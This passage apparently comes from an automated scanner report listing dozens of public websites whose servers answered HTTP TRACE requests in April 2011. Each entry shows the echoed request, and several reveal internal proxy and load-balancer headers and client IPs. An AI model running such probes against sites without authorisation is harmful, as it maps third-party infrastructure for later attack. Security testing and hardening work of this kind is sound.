Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
X-Cache: MISS from ch-sv-bb3.ha-hosting.com
Connection: close

TRACE / HTTP/1.0
Host: www.breitbart.com
Cookie: 1d6a575c65a8632b
Via: 1.0 ch-sv-bb3.ha-hosting.com:80 (squid/2.5.STABLE14)
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=3600
Connection: keep-alive

21.35. http://www.btradv.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.btradv.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.btradv.com
Cookie: 5af4e50bfb16fbe5

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:37 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.btradv.com
Cookie: 5af4e50bfb16fbe5

21.36. http://www.buzzfeed.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzzfeed.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.buzzfeed.com
Cookie: 107720d6e49e93dc

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:12 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.buzzfeed.com
Cookie: 107720d6e49e93dc
X-Forwarded-For: 173.193.214.243

21.37. http://www.buzzillions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.buzzillions.com
Cookie: e0e8df497776aba7

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:30 GMT
Server: Apache/2.2.9 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.buzzillions.com
Cookie: e0e8df497776aba7

21.38. http://www.buzznet.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzznet.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.buzznet.com
Cookie: 41e2049772526b9e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:25 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: 41e2049772526b9e
Host: www.buzznet.com
X-Forwarded-For: 173.193.214.243

21.39. http://www.cafemom.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafemom.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cafemom.com
Cookie: dc8b620e9feda53b

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:28 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cafemom.com
Cookie: dc8b620e9feda53b

21.40. http://www.care2.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.care2.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.care2.com
Cookie: fc1ad76d2900744e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:23 GMT
Server: Apache/2.2.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.care2.com
Cookie: fc1ad76d2900744e
Connection: Keep-Alive
CLIENT-IP: 173.193.214.243

21.41. http://www.caringbridge.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caringbridge.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.caringbridge.org
Cookie: d7fe8f8bb7e415b7

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:06 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.caringbridge.org
Cookie: d7fe8f8bb7e415b7

21.42. http://www.cartoonnetwork.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cartoonnetwork.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cartoonnetwork.com
Cookie: c1482c64ce9a08d1

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:47 GMT
Server: Apache
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: www.cartoonnetwork.com
Cookie: c1482c64ce9a08d1
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.cartoonnetwork.com
X-Forwarded-Server: www.cartoonnetwork.com
Connection: Keep-Alive

21.43. http://www.cdkitchen.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cdkitchen.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cdkitchen.com
Cookie: 250e5fde82f595fd

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) PHP/4.4.7 mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:35:54 GMT
Connection: close

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: 250e5fde82f595fd
Host: www.cdkitchen.com
X-Cluster-Client-Ip: 173.193.214.243

21.44. http://www.cheapstuff.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheapstuff.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cheapstuff.com
Cookie: 508009bfb3a43d94

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:35 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cheapstuff.com
Cookie: 508009bfb3a43d94

21.45. http://www.chuckecheese.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chuckecheese.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.chuckecheese.com
Cookie: c3d54326b29ef892

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.chuckecheese.com
Cookie: c3d54326b29ef892

21.46. http://www.cincinnati.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cincinnati.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cincinnati.com
Cookie: a816a41a0c4cb938

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:52 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cincinnati.com
Cookie: a816a41a0c4cb938

21.47. http://www.city-data.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.city-data.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.city-data.com
Cookie: 1ed27e99221e634b

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:11 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.city-data.com
Cookie: 1ed27e99221e634b

21.48. http://www.citygridmedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citygridmedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.citygridmedia.com
Cookie: d72fec8e25a014d4

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:11 GMT
Server: Apache/2.0.54
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.citygridmedia.com
Cookie: d72fec8e25a014d4

21.49. http://www.classesusa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classesusa.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.classesusa.com
Cookie: 505da4002bb13a89

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:12 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerpl.eduprod=654581770.20480.0000; path=/

TRACE / HTTP/1.0
Host: www.classesusa.com
Cookie: 505da4002bb13a89

21.50. http://www.classifiedads.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classifiedads.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.classifiedads.com
Cookie: b8fb1ebd68a49f9e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:42 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.classifiedads.com
Cookie: b8fb1ebd68a49f9e

21.51. http://www.clear-request.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clear-request.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.clear-request.com
Cookie: 1fe2596a396ac8a1

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:15 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.clear-request.com
Cookie: 1fe2596a396ac8a1

21.52. http://www.clear.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clear.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.clear.com
Cookie: 2a52a95110a10184

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:04 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8r
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.clear.com
Cookie: 2a52a95110a10184

21.53. http://www.cliffsnotes.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cliffsnotes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cliffsnotes.com
Cookie: fb6a57ce56c8fc46

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 14:09:25 GMT
Server: Apache
Content-Type: message/http
Connection: close

TRACE /WileyCDA// HTTP/1.0
Host: www.cliffsnotes.com
Cookie: fb6a57ce56c8fc46
Client-IP: 173.193.214.243, 208.215.179.221
Max-Forwards: 10
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.cliffsnotes.com
X-Forwarded-Server: www.cliffsnotes.com

21.54. http://www.clocklink.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clocklink.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.clocklink.com
Cookie: bbac553a0690ddfa

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:43 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.clocklink.com
Cookie: bbac553a0690ddfa

21.55. http://www.clubpenguin.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clubpenguin.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.clubpenguin.com
Cookie: 23494197b93f129

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:17 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.clubpenguin.com
Cookie: 23494197b93f129
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

21.56. http://www.clubtug.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clubtug.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.clubtug.com
Cookie: 7f034a1887d1c05b

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
Content-Length: 126
Date: Sat, 02 Apr 2011 14:05:48 GMT
X-Varnish: 1589848247
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Cookie: 7f034a1887d1c05b
host: www.clubtug.com
X-Forwarded-For: 173.193.214.243
X-Varnish: 1589848247

21.57. http://www.coldhardcash.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coldhardcash.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.coldhardcash.com
Cookie: 6127003b0ba6f66

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:23 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.coldhardcash.com
Cookie: 6127003b0ba6f66

21.58. http://www.collegeconfidential.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegeconfidential.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.collegeconfidential.com
Cookie: 9506f16d8448a0af

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:55 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerims_ccinfo_pool=3298375690.20480.0000; path=/

TRACE / HTTP/1.0
Host: www.collegeconfidential.com
Cookie: 9506f16d8448a0af
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

21.59. http://www.consumeraffairs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.consumeraffairs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.consumeraffairs.com
Cookie: 2504b2113335bec9

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:08 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.consumeraffairs.com
Cookie: 2504b2113335bec9

21.60. http://www.contactmusic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contactmusic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.contactmusic.com
Cookie: 3dffef939ad54752

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:37 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
Set-Cookie: wwwSERVERID=c2; path=/
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Tue, 31 Dec 2019 12:34:56 GMT
x-cdn: CMcdn
Connection: close

TRACE / HTTP/1.1
Cookie: 3dffef939ad54752
Accept-Encoding: gzip
Host: www.contactmusic.com
X-Forwarded-For: 173.193.214.243, 208.93.140.21
x-chpd-loop: 1
Via: 1.0 PXY008-ASHB.COTENDO.NET (chpd/4.00.0134.3)
Connection: close

21.61. http://www.coolsavings.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolsavings.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.coolsavings.com
Cookie: d8cc09fe09951e1

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:28 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: d8cc09fe09951e1
Host: www.coolsavings.com

21.62. http://www.cornell.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cornell.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cornell.edu
Cookie: ffbd5d1fa9ffef

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:20 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l JRun/4.0
Content-Type: message/http
Set-Cookie: BALANCEID=balancer.cf068; path=/; domain=.cornell.edu
Connection: close

TRACE / HTTP/1.1
Host: www.cornell.edu
Cookie: ffbd5d1fa9ffef
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.cornell.edu
X-Forwarded-Server: www.cornell.edu
Connection: Keep-Alive

21.63. http://www.couponmountain.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.couponmountain.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.couponmountain.com
Cookie: 38f8e569ea3801f1

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:48 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.couponmountain.com
Cookie: 38f8e569ea3801f1
Connection: Keep-Alive
rlnclientipaddr: 173.193.214.243

21.64. http://www.cowboylyrics.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cowboylyrics.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cowboylyrics.com
Cookie: 902e39c9c40d30f5

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:07:59 GMT
Server: Apache/2.2.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cowboylyrics.com
Cookie: 902e39c9c40d30f5

21.65. http://www.cox.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cox.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cox.net
Cookie: dfadc1971560ce16

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:54 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cox.net
Cookie: dfadc1971560ce16
Connection: Keep-Alive

21.66. http://www.craveonline.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.craveonline.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.craveonline.com
Cookie: 3b7962d790c42219

Response

HTTP/1.1 200 OK
Server: Apache/2
Content-Type: message/http
Content-Length: 130
Date: Sat, 02 Apr 2011 14:19:13 GMT
X-Varnish: 1548710198
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS from pxy2v.sb.lax1

TRACE / HTTP/1.0
Host: www.craveonline.com
Cookie: 3b7962d790c42219
X-Varnish: 1548710198
X-Forwarded-For: 173.193.214.243

21.67. http://www.cyberdefender.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cyberdefender.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cyberdefender.com
Cookie: 8aec211e43860d57

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:26 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cyberdefender.com
Cookie: 8aec211e43860d57
Connection: Keep-Alive

21.68. http://www.cz.cc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cz.cc
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cz.cc
Cookie: 5b5d0f9ae90013da

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cz.cc
Cookie: 5b5d0f9ae90013da

21.69. http://www.datpiff.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.datpiff.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.datpiff.com
Cookie: 900a5d883fe325f0

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:21 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.datpiff.com
Cookie: 900a5d883fe325f0

21.70. http://www.demdex.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.demdex.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.demdex.net
Cookie: da66f9aa96b08ce9

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:36 GMT
Server: Apache/2.2.10 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.demdex.net
Cookie: da66f9aa96b08ce9
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

21.71. http://www.detiva.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.detiva.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.detiva.com
Cookie: 76b938d3d1a81b07

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:49:38 GMT
Server: Apache/2.2.2 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.detiva.com
Cookie: 76b938d3d1a81b07

21.72. http://www.dmv.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dmv.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dmv.org
Cookie: 921e2f0b2f673f2a

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:43:22 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.dmv.org
X-Cluster-Client-Ip: 173.193.214.243
Cookie: 921e2f0b2f673f2a
Connection: Keep-Alive

21.73. http://www.domaingateway.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.domaingateway.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.domaingateway.com
Cookie: dbb806718f420462

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:00 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.domaingateway.com
Cookie: dbb806718f420462

21.74. http://www.doubleinks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doubleinks.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.doubleinks.com
Cookie: 74b9ae3b126d7c05

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:03 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.doubleinks.com
Cookie: 74b9ae3b126d7c05

21.75. http://www.driverside.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.driverside.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.driverside.com
Cookie: 14ddbebd852bdfa3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:00 GMT
Server: Apache/2.2.14 (EL)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.driverside.com
Cookie: 14ddbebd852bdfa3

21.76. http://www.driversquad.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.driversquad.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.driversquad.com
Cookie: 7d267a857fc12057

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:28 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.driversquad.com
Cookie: 7d267a857fc12057

21.77. http://www.droidforums.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.droidforums.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.droidforums.net
Cookie: 64f27224e1eb75ff

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:47 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.droidforums.net
Cookie: 64f27224e1eb75ff

21.78. http://www.eatingwell.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eatingwell.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.eatingwell.com
Cookie: 5b77edc9aefddca4

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:54 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.eatingwell.com
Cookie: 5b77edc9aefddca4

21.79. http://www.ebaumsworld.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebaumsworld.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ebaumsworld.com
Cookie: 278d8f10b40c635a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:31 GMT
Server: Apache/2.2.17 (EL)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ebaumsworld.com
Cookie: 278d8f10b40c635a
X-Forwarded-For: 173.193.214.243

21.80. http://www.economist.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.economist.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.economist.com
Cookie: 59ba752348253a96

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Content-Length: 184
Date: Sat, 02 Apr 2011 13:54:47 GMT
X-Varnish: 1459381535
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

TRACE / HTTP/1.0
Host: www.economist.com
Cookie: 59ba752348253a96
X-Real-Forwarded-For: 173.193.214.243, 173.193.214.243
X-Varnish: 1459381535
X-Forwarded-For: 173.193.214.243

21.81. http://www.egotastic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.egotastic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.egotastic.com
Cookie: e59ee05b85dcdca0

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:58 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.egotastic.com
Cookie: e59ee05b85dcdca0
X-Forwarded-For: 173.193.214.243

21.82. http://www.ehealthforum.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ehealthforum.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ehealthforum.com
Cookie: 7f793e7b8c9ea201

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:03 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerehealthforum_POOL=3336900780.0.0000; path=/

TRACE / HTTP/1.0
Host: www.ehealthforum.com
Cookie: 7f793e7b8c9ea201
Connection: Keep-Alive

21.83. http://www.elyrics.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elyrics.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.elyrics.net
Cookie: 2546afeafc36fc88

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.elyrics.net
Cookie: 2546afeafc36fc88

21.84. http://www.elyricsworld.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.elyricsworld.com
Cookie: fb20fcb7d62898b3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 20:22:02 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.elyricsworld.com
Cookie: fb20fcb7d62898b3

21.85. http://www.emediatrack.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emediatrack.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.emediatrack.com
Cookie: 6ccc1680999db3f1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 13:52:27 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 73

TRACE / HTTP/1.0
Host: www.emediatrack.com
Cookie: 6ccc1680999db3f1

21.86. http://www.emedtv.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emedtv.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.emedtv.com
Cookie: 24acb178c118560d

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:55 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.emedtv.com
Cookie: 24acb178c118560d

21.87. http://www.engadget.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.engadget.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.engadget.com
Cookie: a888574bf445d227

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:33 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.engadget.com
Cookie: a888574bf445d227
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:20:9B09:200483,x-lb-client-ip:ajg_u

21.88. http://www.ezanga.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezanga.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ezanga.com
Cookie: dbdef3e805fad541

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:44 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ezanga.com
Cookie: dbdef3e805fad541

21.89. http://www.fantage.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fantage.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.fantage.com
Cookie: a81630fa32073ea2

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:51 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.fantage.com
Cookie: a81630fa32073ea2

21.90. http://www.faqs.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.faqs.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.faqs.org
Cookie: a11c00a79deadc57

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:36 GMT
